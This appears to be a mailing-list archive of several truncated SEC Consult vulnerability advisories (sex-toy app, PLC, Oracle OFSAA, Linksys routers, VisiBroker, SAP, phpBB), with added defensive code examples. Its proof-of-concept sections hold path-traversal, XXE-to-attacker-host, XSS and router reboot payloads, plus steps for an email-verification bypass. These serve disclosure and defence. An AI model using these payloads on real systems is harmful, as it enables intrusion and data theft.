 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"Control with Vibratissimo your AMOR Toy on your smartphone and get even more
features by the app. With Vibratissimo you are open to new and exciting
opportunities, whether you are in the same room or on different continents."

Source: http://www.vibratissimo.com/en/index.html


Business recommendation:

SEC Consult highly recommends to update the app to the newest version available
in the appstore. Furthermore the password, which was used within the app,
should be changed immediately. If the password was used for multiple services,
all passwords should be changed. To get rid of issue number 3 (Unauthenticated
Bluetooth LE Connections) a firmware update can be applied. To apply the
firmware update the devices have to be sent to Amor Gummiwaren GmbH.


Vulnerability overview/description:
---
1) Customer Database Credential Disclosure
The credentials for the whole Vibratissimo database environment were exposed on
the internet. Because the phpMyAdmin interface was exposed as well, an attacker
could have connected to the database and dumped the whole data set. The data set
contains for example the following data:

- Usernames
- Session Tokens
- Cleartext passwords
- chat histories
- explicit image galleries, which are created by the users themselves


2) Exposed administrative interfaces on the internet
An administrative interface for databases was available without any filtering to
the whole internet. In combination with other vulnerabilities an attacker
could have been able to get access to the whole database data and even take over
the server.


3) Cleartext Storage of Passwords
The user passwords were stored unhashed in cleartext in the database.
If an attacker gained access to the database (e.g. via credential disclosure),
he could have been able to retrieve the plaintext passwords of users and abuse
their privileges in the system.
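The combination of issue 1 and issue 3 is what turns a database leak into an
account takeover: a dumped table of cleartext passwords is immediately usable,
whereas a dump of salted, iterated hashes still has to be cracked one entry at
a time. The following Python example is added by the editor and is not code
from the Vibratissimo backend or the advisory. It shows a self-describing
password record built with PBKDF2-HMAC-SHA256 from the standard library and a
constant-time verifier; the iteration count and the sample users are
assumptions chosen for illustration.

```python
import hashlib
import hmac
import secrets

ITERATIONS = 210_000   # assumption: tune so one hash costs ~100 ms on the login servers
SALT_BYTES = 16


def hash_password(password: str) -> str:
    """Return a record of the form algorithm$iterations$salt_hex$digest_hex.
    A fresh random salt per user means equal passwords give different records."""
    salt = secrets.token_bytes(SALT_BYTES)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, record: str) -> bool:
    """Recompute from the parameters stored in the record; compare in constant time."""
    algo, iters, salt_hex, digest_hex = record.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError(f"unsupported record type {algo!r}")
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iters)
    )
    return hmac.compare_digest(digest.hex(), digest_hex)


def user_table(passwords: dict, hashed: bool) -> dict:
    """What a database dump exposes under each design. Constructed sample input:
    a mapping of username to the password the user chose."""
    return {user: (hash_password(pw) if hashed else pw) for user, pw in passwords.items()}


if __name__ == "__main__":
    sample = {"amy": "s3cret", "ben": "s3cret"}        # constructed sample data
    print("cleartext dump:", user_table(sample, hashed=False))
    print("hashed dump   :", user_table(sample, hashed=True))
```

In the hashed dump the two users with the same password get different
records, so an attacker who obtains the table cannot even tell that they
share a password, let alone read it.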


4) Unauthenticated Bluetooth LE Connections
The sex toys are connected without prior authentication to the app, which is the
standard use case. For example one of the identified Bluetooth services allows
to read the current device temperature. Other services, which can be
accessed without prior authentication are:

-) Setting the "intensity" of the current vibration pattern
-) Reading various values (Temperature, etc)


5) Insufficient Authentication Mechanism
The android application is using a type of authentication, which is against
known best practice. The username and password are sent with every
request to the server to authenticate and authorise the request. There is no
session management implemented. However, the authentication credentials are
transmitted via an encrypted SSL/TLS connection.


6) Insecure Direct Object Reference
Due to flaws in the authorization schema, an authorization bypass vulnerability
allows an attacker to get access to restricted functions and resources. In this
case a user is able to set a profile picture by uploading a provided image. The
image is stored on the Vibratissimo server and renamed. All images are renamed
by incrementing a global number and assigning this number as the name of the
image (e.g 200.png). An attacker is now able to iterate through those images and
dump personal user images containing partially explicit content. The image can
even be accessed if the profile has been set to "hidden" by the user.
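Issue 6 above and the TestLink advisory earlier on this page (skipCheck=1 on
attachmentdownload.php) share one root cause: the object identifier is a small
sequential number, and the only thing standing between a stranger and the file
is a check that either does not run or can be switched off from the client.
The following Python model is added by the editor and is not code from
Vibratissimo, TestLink or either advisory. It reproduces the enumeration the
advisories describe against a store named by incrementing integers, and sets it
beside a handler whose authorization check is unconditional and whose
references are random opaque tokens; the user names and images are
constructed sample data.

```python
import secrets
from dataclasses import dataclass, field


@dataclass
class Image:
    owner: str
    data: bytes
    hidden: bool = False       # profile set to "hidden" by its owner


@dataclass
class ImageStore:
    """Files reachable both by sequential number (200.png, 201.png, ...) and
    by the opaque reference the fixed handler uses instead."""
    by_seq: dict = field(default_factory=dict)
    by_ref: dict = field(default_factory=dict)
    next_seq: int = 200

    def upload(self, owner: str, data: bytes, hidden: bool = False):
        img = Image(owner, data, hidden)
        seq = self.next_seq
        self.next_seq += 1
        ref = secrets.token_urlsafe(16)     # 128 random bits: not enumerable
        self.by_seq[seq] = img
        self.by_ref[ref] = img
        return seq, ref


def download_vulnerable(store, requester, seq: int, skip_check: bool = False) -> bytes:
    """The weak pattern: a client-controlled flag disables the check, and the
    check itself only consults the hidden flag, never whether anyone is logged in."""
    img = store.by_seq.get(seq)
    if img is None:
        raise KeyError(seq)
    if skip_check:
        return img.data
    if img.owner != requester and img.hidden:
        raise PermissionError("hidden profile")
    return img.data


def download_fixed(store, requester, ref: str) -> bytes:
    """Authorization is evaluated on every request and cannot be bypassed."""
    img = store.by_ref.get(ref)
    if img is None:
        raise KeyError(ref)
    if requester is None:
        raise PermissionError("authentication required")
    if img.owner != requester and img.hidden:
        raise PermissionError("not visible to this user")
    return img.data


def enumerate_vulnerable(store, first: int, last: int) -> dict:
    """What the advisories describe: walk the ID range, keep everything found."""
    found = {}
    for seq in range(first, last + 1):
        try:
            found[seq] = download_vulnerable(store, None, seq, skip_check=True)
        except KeyError:
            pass
    return found


if __name__ == "__main__":
    store = ImageStore()
    store.upload("alice", b"alice.png", hidden=True)     # constructed sample data
    store.upload("bob", b"bob.png")
    print("enumerated without a session:", enumerate_vulnerable(store, 200, 210))
```

Against the fixed handler an unauthenticated caller gets nothing, a logged-in
user sees only non-hidden images of others, and there is no integer range to
iterate in the first place.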


7) Missing Authentication in Remote Control
The mobile apps allow their users to use a feature called quick control.
This feature allows to send a link with a unique ID to an email address or a
telephone via SMS to get direct control of the sex toy over the internet.
This wouldn't be a problem in gener

SEC Consult SA-20180131-0 :: Multiple Vulnerabilities in Sprecher Automation SPRECON-E-C, PU-2433

2018-01-30 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20180131-0 >
===
  title: Multiple Vulnerabilities
product: Sprecher Automation SPRECON-E-C, PU-2433
 vulnerable version: <8.49 (most vulnerabilities, see "Vulnerable version" for
 details)
  fixed version: 8.49 (most vulnerabilities, see "Solution" for details)
 CVE number: -
 impact: Medium
   homepage: https://www.sprecher-automation.com
  found: 2017-08-15
 by: T. Weber, C.A. (Office Vienna)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"Sprecher Automation GmbH offers switchgears and automation solutions
for energy, industry and infrastructure processes. Our customers are
power utilities, industries, transportation companies, municipal
utilities and public institutions.

Company-own developments and cooperations with technology
partners lead to a unique product portfolio consisting of traditional
electrical technologies as well as high-tech electronics."

Source: https://www.sprecher-automation.com/en/


Business recommendation:

SEC Consult recommends to immediately patch the systems and follow the
hardening guide provided by the vendor (SEC Consult did not have access to the
hardening guide in order to review it).

A thorough security review should be performed by security professionals as
further security issues might exist within the product.


Vulnerability overview/description:
---
1) Authenticated Path Traversal Vulnerability
The web interface of the Sprecher PLC suffers from a path traversal
vulnerability. A user which is authenticated on the web interface,
which is intended as read-only interface, can download files with the
permissions of the webserver (www-data).

Files like "/etc/shadow" are not readable for the webserver.


2) Client-Side Password Hashing
The password hashes which are stored on the system can be directly
used to authenticate on the web interface (pass-the-hash) since the password
is hashed in the browser of the user during login.


3) Missing Authentication
The PLC exposes a Telnet management service on TCP port 2048.
This interface can be used to control the PLC and does not require any
authentication.


4) Permanent Denial of Service via Portscan
An aggressive TCP SYN scan on a large amount of ports triggers a denial
of service of the PLC service. This results in a persistent DoS of the
standby PLC in an active - standby pair. Manual operator intervention is
required to restore service availability.


5) Outdated Linux Kernel
An ancient Linux kernel version with a high number of known security weaknesses
is used for the PLC base operating system.


Proof of concept:
-
1) Authenticated Path Traversal Vulnerability
Reading "passwd" is possible by triggering the following request:
---
GET /webserver/cgi-bin/spre.cgi?4_1=../../../../../../../etc/passwd HTTP/1.1
Host: 
Cookie: sid=
Connection: close
Upgrade-Insecure-Requests: 1
---

The file is directly fetched from the system:
---
root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:100:sync:/bin:/bin/sync
mail:x:8:8:mail:/var/spool/mail:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
operator:x:37:37:Operator:/var:/bin/sh
haldaemon:x:68:68:hald:/:/bin/sh
dbus:x:81:81:dbus:/var/run/dbus:/bin/sh
nobody:x:99:99:nobody:/home:/bin/sh
sshd:x:103:99:Operator:/var:/bin/sh
[...]
---
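The request above, and the SecurEnvoy path traversal described earlier on this
page, both succeed because the file name taken from the request is joined to a
base directory without ever checking where the resulting path ends up. The
following Python example is added by the editor and is not code from the
SPRECON web interface, SecurEnvoy or either advisory. It compares canonical
paths instead of searching for "../" substrings, so percent-encoded dots,
absolute paths, NUL bytes and symlinks that lead out of the document root are
all caught; the temporary document root it builds is a constructed fixture.

```python
import os
import tempfile
from urllib.parse import unquote


class TraversalError(ValueError):
    pass


def safe_join(base_dir: str, requested: str) -> str:
    """Resolve a client-supplied relative path inside base_dir, or raise.

    Works on canonical (realpath) forms: a request is accepted only if the
    fully resolved target still lies under the resolved base directory.
    """
    base = os.path.realpath(base_dir)
    decoded = unquote(requested)          # decode %2e%2e%2f exactly once
    if "\x00" in decoded:
        raise TraversalError("NUL byte in path")
    if os.path.isabs(decoded):
        raise TraversalError("absolute paths are not allowed")
    candidate = os.path.realpath(os.path.join(base, decoded))
    if os.path.commonpath([base, candidate]) != base:
        raise TraversalError(f"{requested!r} resolves outside {base_dir!r}")
    return candidate


def probe(base_dir: str, requested: str) -> str:
    """'ok' or 'rejected', for tabulating inputs."""
    try:
        safe_join(base_dir, requested)
        return "ok"
    except TraversalError:
        return "rejected"


def build_demo_tree() -> str:
    """Constructed fixture: a document root with one file and, where the
    platform permits, a symlink named 'escape' pointing at the filesystem root."""
    base = tempfile.mkdtemp(prefix="webroot-")
    os.makedirs(os.path.join(base, "docs"))
    with open(os.path.join(base, "docs", "report.txt"), "w") as fh:
        fh.write("public report\n")
    try:
        os.symlink(os.path.abspath(os.sep), os.path.join(base, "escape"))
    except OSError:
        pass
    return base


def demo_results() -> dict:
    """Run the probe over the classic traversal inputs against the fixture."""
    root = build_demo_tree()
    requests = [
        "docs/report.txt",
        "../../../../../../../etc/passwd",
        "%2e%2e%2f%2e%2e%2fetc%2fpasswd",
        "/etc/passwd",
        "docs/report.txt\x00.png",
    ]
    if os.path.islink(os.path.join(root, "escape")):
        requests.append("escape/etc/passwd")
    return {req: probe(root, req) for req in requests}


if __name__ == "__main__":
    for req, verdict in demo_results().items():
        print(f"{req!r:45} -> {verdict}")
```

Only the legitimate document path is accepted; the seven-level "../" request
from the PoC, its percent-encoded form, the absolute path and the symlink
detour all resolve outside the root and are refused before any file is opened.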


2) Client-Side Password Hashing
The passwords are hashed in JavaScript before they are transmitted to the
device. Therefore the hash is as good as the password.

The following request shows a login process:
---
POST /webserver/cgi-bin/spre.cgi HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: application/json
Accept-Language: de
Content-Type: application/x-www-form-urlencoded
If-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMT
Referer: http:///We

SEC Consult SA-20180123-0 :: XXE & Reflected XSS in Oracle Financial Services Analytical Applications

2018-01-23 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20180123-0 >
===
  title: XXE & Reflected XSS
product: Oracle Financial Services Analytical Applications
 vulnerable version: 7.3.5.x, 8.0.x
  fixed version: Oracle CPU January 2018
 CVE number: CVE-2018-2660, CVE-2018-2661
 impact: High
   homepage: http://www.oracle.com/us/products/applications/
 financial-services/analytical-applications/index.html
  found: 2017-06-15
 by: Mohammad Shah Bin Mohammad Esa, Samandeep Singh
 (Office Singapore)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"Oracle is the unchallenged leader in Financial Services, with an
integrated, best-in-class, end-to-end solution of intelligent software
and powerful hardware designed to meet every financial service need."

Source: http://www.oracle.com/us/products/applications/
financial-services/analytical-applications/index.html


Business recommendation:

By exploiting the XXE vulnerability, an attacker can get read access to the
filesystem of the user's system using the OFSAA web application and thus obtain
sensitive information from the system. It is also possible to bypass input
validation checks in order to inject JavaScript code.

SEC Consult recommends to immediately install the patched version.
Furthermore, a thorough security review should be performed by security
professionals to identify potential further security issues.


Vulnerability overview/description:
---
1) XML eXternal Entity (XXE) Injection (CVE-2018-2660)
The web application allows users to import XML files. An attacker can import a
specially crafted XML file and exploit the XXE vulnerability within the 
application.

2) Reflected Cross Site Scripting (CVE-2018-2661)
This vulnerability allows an unauthenticated user to inject malicious client
side script which will be executed in the browser of a user when that user
visits the manipulated URL.


Proof of concept:
-
1) XML External Entity Injection (XXE) (CVE-2018-2660)
For example, by importing the following XML code in the "Business Model Upload"
function, a connection request from the server to the attacker's system is
made.


 
   http://[IP:port]/; >]>

IP:port = IP address and port where the attacker is listening for connections

Furthermore some files can be exfiltrated to remote servers via the
techniques described in:

https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-wp.pdf
http://vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf


2) Reflected Cross Site Scripting (CVE-2018-2661)
The following parameters have been found to be vulnerable to
reflected cross site scripting attacks. They are examples only; many more
parameters are vulnerable.

The following payload shows a simple alert message box:
URL     : http://$DOMAIN/OFSAA/admin/PopupAlert_H5.jsp?winTitle=
METHOD  : GET
PAYLOAD :
winTitle=a%3C/title%3E%3Cimg%0A%20src=x%20onerror=%22prompt%0A%28%27SEC%20consult%20-%20XSS%27%29%22%3E

URL     : http://$DOMAIN/OFSAA/fsapps/common/MM_PageOpener_crossBrowser.jsp?
url=fetchErrorMessages.action=OCBCOFSAASG=summarypage={62}~
METHOD  : GET
PAYLOAD : errorMessage={62}~%27;alert%0a(0);//=DeleteConfirm


Vulnerable / tested versions:
-
The following version has been tested which was the most recent one when
the vulnerabilities were discovered:

* Oracle Financial Services Analytical Applications 8.0.4.0.0

According to Oracle all versions 7.3.5.x and 8.0.x are affected before CPU
January 2018.


Vendor contact timeline:

2017-09-11: Contacting vendor through encrypted email (secalert...@oracle.com)
2017-09-20: Vendor requested to postpone the release date
2018-01-13: Vendor informed that the Critical Patch Update including fixes
for the reported issues will be released on 2018-01-16.
CVE-2018-2660 & CVE-2018-2661 were assigned for the issues
2018-01-23: Public disclosure of advisory


Solution:
-
Apply the January 2018 Critical Patch Update:
http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html


Workaround:
---
None


Advisory URL:
-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin

SEC Consult SA-20171018-1 :: Multiple vulnerabilities in Linksys E-series products

2017-10-18 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20171018-1 >
===
  title: Multiple vulnerabilities
product: Linksys E series, see "Vulnerable / tested versions"
 vulnerable version: see "Vulnerable / tested versions"
  fixed version: no public fix, see solution/timeline
 CVE number: -
 impact: high
   homepage: http://www.linksys.com/
  found: 2017-06-26
 by: T. Weber (Office Vienna)
     SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"Today, Belkin International has three brands – Belkin, Linksys and WeMo
– to enhance the technology that connects us to the people, activities
and experiences we love. Belkin products are renowned for their
simplicity and ease of use, while our Linksys brand helped make
wireless connectivity mainstream around the globe. Our newest brand,
WeMo, is the leader in delivering customizable smart home experiences.
Its product platform empowers people to monitor, measure and manage
their electronics, appliances and lighting at home and on-the-go."

Source: http://www.belkin.com/uk/aboutUs/


Business recommendation:

SEC Consult recommends not to use this product in a production environment
until a thorough security review has been performed by security
professionals and all identified issues have been resolved.


Vulnerability overview/description:
---
1) Denial of Service (DoS)
A denial of service vulnerability is present in the web server of the
device. This vulnerability is very simple to trigger since a single GET
request to a cgi-script is sufficient.

A crafted GET request, e.g. triggered via CSRF through a user in the
internal network, can reboot the whole device or freeze the web interface
and the DHCP service. No authentication is required for this action.

2) HTTP Header Injection & Open Redirect
Due to a flaw in the web service, a header injection can be triggered
without authentication. This kind of vulnerability can be used to perform
different arbitrary actions; one example in this case is an open redirect
to another web site. In the worst case, the session ID of an authenticated
user can be stolen this way, because the session ID is embedded in the URL,
which is another flaw of the web service.

3) Improper Session-Protection
The session ID for administrative users can be fetched from the device from
LAN without credentials because of insecure session handling.
This vulnerability can only be exploited when an administrator was
authenticated to the device before the attack and opened a session previously.

The login works if the attacker has the same IP address as the PC
of the legitimate administrator. Therefore, a CSRF attack is possible when
the administrator is lured to surf on a malicious web site or to click on
a malicious link.

4) Cross-Site Request Forgery Vulnerability in Admin Interface
A cross-site request forgery vulnerability can be triggered in the
administrative interface. This vulnerability can be exploited because the
session ID can be hijacked via LAN by using 3). Exploitation via the Internet
is only possible if the session ID is exposed to the Internet (for example via
the referrer).

An attacker can change any configuration of the device by luring a user to
click on a malicious link or surf to a malicious web-site.

5) Cross-Site Scripting Vulnerability in Admin Interface
A cross-site scripting vulnerability can be triggered in the administrative
interface. This vulnerability can be exploited because the session ID can
be hijacked via LAN by using 3). Exploitation via the Internet is only possible
if the session ID is exposed to the Internet (for example via the referrer).

By using this vulnerability, malicious code can be executed in the context of
the browser session of the attacked user.


Proof of concept:
-
1) Denial of Service

Unauthenticated request for triggering a router reboot in browser:
http:///upgrade.cgi
http:///restore.cgi

Unauthenticated request for triggering a router freeze in browser:
http:///mfgtst.cgi


2) HTTP Header Injection & Open Redirect

A header injection can be triggered by the following unauthenticated request:

Request:
--
POST /UnsecuredEnable.cgi HTTP/1.1
Host: 
Accept: */*
Accept-Language: en
Connection: close
Referer: http:///Unsecured.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 97

SEC Consult SA-20171016-0 :: Multiple vulnerabilities in Micro Focus VisiBroker C++

2017-10-16 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20171016-0 >
===
  title: Multiple vulnerabilities
product: Micro Focus VisiBroker C++
 vulnerable version: 8.5 SP2
  fixed version: 8.5 SP4 HF3
 CVE number: CVE-2017-9281, CVE-2017-9282, CVE-2017-9283
 impact: High
   homepage: https://www.microfocus.com/products/corba/visibroker/
  found: 2017-04
 by: W. Ettlinger (Office Vienna)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"VisiBroker(TM) is a comprehensive CORBA environment for developing, deploying,
and managing distributed applications. Built on open industry standards and a
high-performance architecture, VisiBroker is especially suited to low-latency,
complex, data-oriented, transaction-intensive, mission-critical environments.
Using VisiBroker(R), organizations can develop, connect, and deploy complex
distributed applications that have to meet very high performance and reliability
standards. With more than 30 million licenses in use, VisiBroker is the world’s
most widely deployed CORBA Object Request Broker (ORB) infrastructure."

URL: https://www.microfocus.com/products/corba/visibroker/


Business recommendation:

During a superficial fuzzing test, SEC Consult found several memory corruption
vulnerabilities that allow denial of service attacks or potentially arbitrary
code execution. Although the fuzzing test only had a very limited coverage,
several vulnerabilities have been identified. Assuming the code quality is
homogeneous, it is possible that other parts of the application exhibit
similar issues.

SEC Consult did not attempt to fully evaluate the potential impact of the
identified vulnerabilities.

SEC Consult recommends to decommission any VisiBroker C++ component that
communicates with untrusted entities until a full security audit has been
performed. Moreover, SEC Consult recommends to restrict network access to all
CORBA services that utilize the VisiBroker C++ environment.


Vulnerability overview/description:
---
1) Integer Overflow / Out of Bounds Read (Denial of Service) [CVE-2017-9281]
By specifying a large value for a length field, an integer overflow occurs.
As a result, the application reads memory until a non-mapped memory region
is reached. This causes the application to encounter a segmentation fault.


2) Integer Overflow (Heap Overwrite) [CVE-2017-9282]
By specifying a manipulated value for a length field an attacker can cause an
integer overflow. This causes the application to allocate too little memory.
When the application attempts to write to this memory buffer, heap memory is
overwritten leading to denial of service or potentially arbitrary code
execution.


3) Out of Bounds Read [CVE-2017-9283]
By specifying a manipulated value for a length field, an attacker can cause
the application to read past an allocated memory region.


4) Use after Free
SEC Consult found that the application under certain circumstances tries to
access a memory region that has been deallocated before.

It is unclear whether Micro Focus fixed the root cause of this behaviour. As
the vendor was unable to reproduce the vulnerability in the current version,
Micro Focus believes that the vulnerability was fixed with a previous update.

Since SEC Consult is unsure whether Micro Focus found the root cause of the
vulnerability, we refrain from releasing proof of concept code.


Proof of concept:
-
A service implementing the following IDL was used to identify the
vulnerabilities listed here:

module Bank {
  interface Account {
    float balance(in string test);
  };
  interface AccountManager {
    Account open(in string name);
  };
};

The implemented service was based on the VisiBroker example project
"bank_agent".


1) Integer Overflow / Out of Bounds Read (Denial of Service)
The method

CORBA_MarshalOutBuffer *__cdecl CORBA_MarshalOutBuffer::put(
    CORBA_MarshalOutBuffer *this,
    const char *src,
    unsigned int size)

is used to copy/append a char[] into a buffer. If the size of the data that is
stored in the buffer plus the size of the char[] to be appended exceeds the
allocated size, the method reallocates the buffer. By choosing the
size of the char[] as e.g. 0x (on 32 bit systems) an integer overflow
can be caused. The method then continues without allocating additional memory.

However, the application then expects that the source buffer contains 0x
bytes o
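The wrapping length check described above, as an added example that is not VisiBroker's code: a minimal growable buffer with the vulnerable comparison beside an overflow-safe one, and a hardened append that also bounds the length field by the bytes actually readable at the source. The struct, field and function names are assumptions made for this example.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Growable marshalling buffer modelled on the advisory's description of
 * CORBA_MarshalOutBuffer::put(). The struct, field names and helper
 * functions are assumptions for this example, not VisiBroker's code. */
typedef struct {
    char *data;
    uint32_t used;      /* bytes currently stored */
    uint32_t capacity;  /* bytes allocated for data */
} out_buffer;

/* The growth test as the advisory describes it: "the size of the data
 * stored in the buffer plus the size of the char[] to be appended
 * exceeds the allocated size". In 32-bit arithmetic the sum wraps for a
 * huge attacker-chosen size, the test reports that no growth is needed,
 * and the subsequent copy runs off the end of the buffer and of the
 * source message. */
bool needs_grow_vulnerable(uint32_t used, uint32_t capacity, uint32_t size)
{
    uint32_t total = used + size;   /* wraps modulo 2^32 */
    return total > capacity;
}

/* Overflow-safe form: compare the request against the remaining room.
 * capacity - used cannot underflow because used <= capacity is kept as an
 * invariant by out_buffer_put(). */
bool needs_grow_safe(uint32_t used, uint32_t capacity, uint32_t size)
{
    return size > capacity - used;
}

bool out_buffer_init(out_buffer *b, uint32_t initial_capacity)
{
    b->data = malloc(initial_capacity ? initial_capacity : 1);
    b->used = 0;
    b->capacity = b->data ? initial_capacity : 0;
    return b->data != NULL;
}

void out_buffer_free(out_buffer *b)
{
    free(b->data);
    b->data = NULL;
    b->used = 0;
    b->capacity = 0;
}

/* Hardened append. src_avail is how many bytes are really readable at src
 * (for a wire decoder: the unread remainder of the message), so a length
 * field taken from the network can neither wrap the capacity check nor
 * make the copy read past the input. Returns false and leaves the buffer
 * untouched on any rejected request. */
bool out_buffer_put(out_buffer *b, const char *src, size_t src_avail, uint32_t size)
{
    if (size > src_avail) {
        return false;               /* length field larger than the input */
    }
    if (size > UINT32_MAX - b->used) {
        return false;               /* total would not fit in 32 bits */
    }
    if (needs_grow_safe(b->used, b->capacity, size)) {
        uint32_t need = b->used + size;           /* cannot wrap, checked above */
        uint32_t new_cap = b->capacity ? b->capacity : 1;
        while (new_cap < need) {
            /* double, but never past UINT32_MAX */
            new_cap = (new_cap > UINT32_MAX / 2) ? need : new_cap * 2;
        }
        char *grown = realloc(b->data, new_cap);
        if (grown == NULL) {
            return false;
        }
        b->data = grown;
        b->capacity = new_cap;
    }
    memcpy(b->data + b->used, src, size);
    b->used += size;
    return true;
}
```

With 16 bytes stored in a 64-byte buffer, a requested size of 0xFFFFFFF0 makes the vulnerable check report "no growth needed" because 16 + 0xFFFFFFF0 wraps to 0, while the safe check correctly rejects it.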

SEC Consult SA-20170912-0 :: Email verification bypass in SAP E-Recruiting

2017-09-12 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20170912-0 >
===
  title: Email verification bypass
product: SAP E-Recruiting
 vulnerable version: 605, 606, 616, 617
  fixed version: see SAP security note number 2507798
 impact: medium
   homepage: https://www.sap.com
  found: 2017-07-12
 by: Marc Nimmerrichter (Office Vienna)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Berlin - Frankfurt/Main - Montreal - Moscow
 Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"SAP E-Recruiting" has recruitment and succession planning instruments that
will help your company find new employees, employ them in positions that suit
their capabilities, promote their professional development, and retain them in
the long term.
As well as enabling you to handle your company’s applicant tracking activities,
"SAP E-Recruiting" ensures that you drive up-to-date human resources management,
by proactively maintaining contact with applicants, potential candidates, and
consequently, with your employees.

Source:
https://help.sap.com/saphelp_erp60_sp/helpdata/en/73/8bcf535b804808e1000a174cb4/frameset.htm


Business recommendation:

Email address verification during the applicant registration can be bypassed.
Businesses using the vulnerable component are advised to estimate the impact of
insufficient email address verification on their business processes and react
accordingly. It is recommended to install a patched version as soon as possible.


Vulnerability overview/description:
---
When an external applicant registers to the E-Recruiting application, he/she
receives a link by email to confirm access to the provided email address.
However, this measure can be bypassed and attackers can register and confirm
email addresses that they do not have access to.

An attacker could register email addresses not belonging to him/her. This could
have a business impact, because business processes might rely on a verified
email address. Furthermore, since an email address can be registered only once,
an attacker could prevent other legitimate users from registering to the
E-Recruiting application.


Proof of concept:
-
The email verification link contains the "param" HTTP GET parameter with base64
encoded data. When decoded, this data contains the parameters
"candidate_hrobject" and "corr_act_guid". candidate_hrobject is an incremental
user ID. corr_act_guid is a random value that needs to be provided during the
email verification. However, this value is not bound to the current
registration, which means that the value of a previous registration can be
reused. Since candidate_hrobject is incremental, it can be guessed by an
attacker. An attacker who wants to register with an email address not belonging
to him/her, could simply do the following:

  1. Register with his own email address
  2. Directly afterwards register with someone else's email address
  3. Read the current value of candidate_hrobject in the confirmation
     link from the first registration
  4. Increment this value by 1
  5. Send the new value in the HTTP GET request, using the corr_act_guid
     parameter from the first registration
  6. If this did not work: go back to step 4 to try the next ID
     (maybe other people registered in between the two registrations)

This attack works because there is no per-registration nonce in the
confirmation link.


Vulnerable / tested versions:
-
The vulnerability was found in the following release of E-Recruiting (ERECRUIT):
Release: 617

According to the vendor, the following versions are affected:
Release: 605, 606, 616, 617


Vendor contact timeline:

2017-07-12: Contacted vendor via encrypted email with vulnerability description
and Responsible Disclosure Policy attached at sec...@sap.com
2017-07-13: Vendor confirmed the receipt of the email
2017-07-25: Vendor confirmed the vulnerability
2017-07-31: Contacted vendor to ask for patch release date and versions affected
2017-08-01: Vendor stated they are working on the fix and requested "adequate
time". Link to SAP Responsible Disclosure Policy was provided.
2017-08-01: Discussing release date, requested planned patch release date and
versions affected.
2017-08-02: Vendor stated that the patch cannot be published until 2017-08-31
and requested more time before advisory publication.
2017-08-23: Contacted vendor to request current patch status, planne

SEC Consult SA-20170804-0 :: phpBB Server Side Request Forgery (SSRF) vulnerability

2017-08-04 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20170804-0 >
===
  title: Server Side Request Forgery Vulnerability
product: phpBB
 vulnerable version: 3.2.0
  fixed version: 3.2.1
 CVE number:
 impact: Medium
   homepage: https://www.phpbb.com/
  found: 2017-05-21
 by: Jasveer Singh (Office Kuala Lumpur)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"phpBB is a free flat-forum bulletin board software solution that can be used
to stay in touch with a group of people or can power your entire website. With
an extensive database of user-created extensions and styles database
containing hundreds of style and image packages to customise your board, you
can create a very unique forum in minutes."

Source: https://www.phpbb.com/


Business recommendation:

The patch should be installed immediately. Furthermore, SEC Consult recommends
to perform a thorough security review of this software.


Vulnerability overview/description:
---
The phpBB forum software is vulnerable to server-side request forgery
(SSRF). An attacker is able to perform port scanning, request internal
content and potentially attack such internal services via the web
